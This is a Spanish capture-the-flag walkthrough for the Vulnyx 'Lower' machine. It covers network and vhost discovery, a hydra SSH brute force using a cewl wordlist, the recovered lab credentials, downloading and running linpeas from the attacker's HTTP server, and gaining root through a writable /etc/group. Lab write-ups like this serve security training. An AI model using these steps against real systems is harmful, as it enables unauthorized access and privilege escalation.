Máquina Lower (Vulnyx)


Comenzamos con averiguar la dirección IP de la Máquina Victima, para ello primeramente utilizaremos la herramienta netdiscover, para ello ejecutamos el siguiente comando:

$ netdiscover -i eth1 -r 10.0.2.0/24

  • Kali (Máquina Atacante): 10.0.2.4
  • Máquina Victima: 10.0.2.27

Comprobamos si tenemos conexión con la Máquina Victima, para ello ejecutamos el siguiente comando:

$ ping -c 1 10.0.2.27

Como se puede comprobar por el TTL nos enfrentamos a una Máquina Linux.

A continuación, realizamos con la herramienta nmap un reconocimiento de los servicios, para ello ejecutamos el siguiente comando:

$ nmap -Pn 10.0.2.27 -sVC

Como podemos comprobar la Máquina Victima tiene abiertos los puertos 22 y 80 y nos muestra el dominio unique.nyx, Lo agregamos al archivo /etc/hosts, para ello ejecutamos el siguiente comando:

$ nano /etc/host

Comprobamos que es lo que corre en el dominio.

Nos sale ese error.

A continuación, realizamos con la herramienta gobuster un fuzzing web por subdominios, para ello ejecutamos el siguiente comando:

$ gobuster vhost -u http://unique.nyx -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt --append-domain

Encontramos el subdominio tech.unique.nyx

Lo agregamos también al archivo /etc/hosts, para ello ejecutamos el siguiente comando:

$ nano /etc/hosts

Accedemos al subdominio encontrado.

Rebuscamos en todos los apartados de la pagina web.


En el apartado TEAM nos encontramos que hay tres trabajadores con sus respectivos nombres, por lo tanto nos creamos un diccionario con dichos nombres, para ello ejecutamos el siguiente comando:

$ nano user.txt

A continuación, con la ayuda de la herramienta cewl nos creamos un diccionario de palabras de la pagina web encontrada, para ello ejecutamos el siguiente comando:

$ cewl http://tech.unique.nyx --with-number -w pass.txt

Con la herramienta hydra realizamos un ataque a ssh para comprobar si algunos de los usuarios junto con su contraseña es válido para conectarnos a la Máquina Víctima via ssh, para ello ejecutamos el siguiente comando:

$ hydra -L user.txt -P pass.txt ssh://10.0.2.27 -T 64

Obtenemos las credenciales lancer:NewY0rk.

A continuación, nos conectamos por ssh, para ello ejecutamos el siguiente comando:

$ ssh lancer@10.0.2.27

Introducimos la contraseña obtenida anteriormente.

¡¡¡Somos lancer!!!

A continuación, en nuestra Máquina Atacante nos montamos un servidor HTTP con python, para ello ejecutamos el siguiente comando:

$ python3 -m http.server 80

En la Máquina Victima nos descargamos la herramienta Linpeas, para ello ejecutamos el siguiente comando:

$ wget http://10.0.2.4/linpeas.sh

A continuación, le damos permiso de ejecución, para ello ejecutamos el siguiente comando:

$ chmod +x Linpeas.sh

Lo ejecutamos, para ello ejecutamos el siguiente comando:

$ ./linpeas.sh

Nos damos cuenta que en el archivo /etc/group se puede escribir, por lo tanto agregamos al usuario lancer al grupo sudo, para ello ejecutamos el siguiente comando:

$ nano /etc/group


Nos desconectamos del sistema y nos volvemos a conectar por ssh, para ello ejecutamos nuevamente el siguiente comando:

$ ssh lancer@10.0.2.27

Una vez conectados nuevamente, iniciamos la sesión como el usuario root, introduciendo la contraseña del usuario lancer, para ello ejecutamos el siguiente comando:

$ sudo su

¡¡¡Ya somos root!!!

Ya podemos leer las flags de user y root.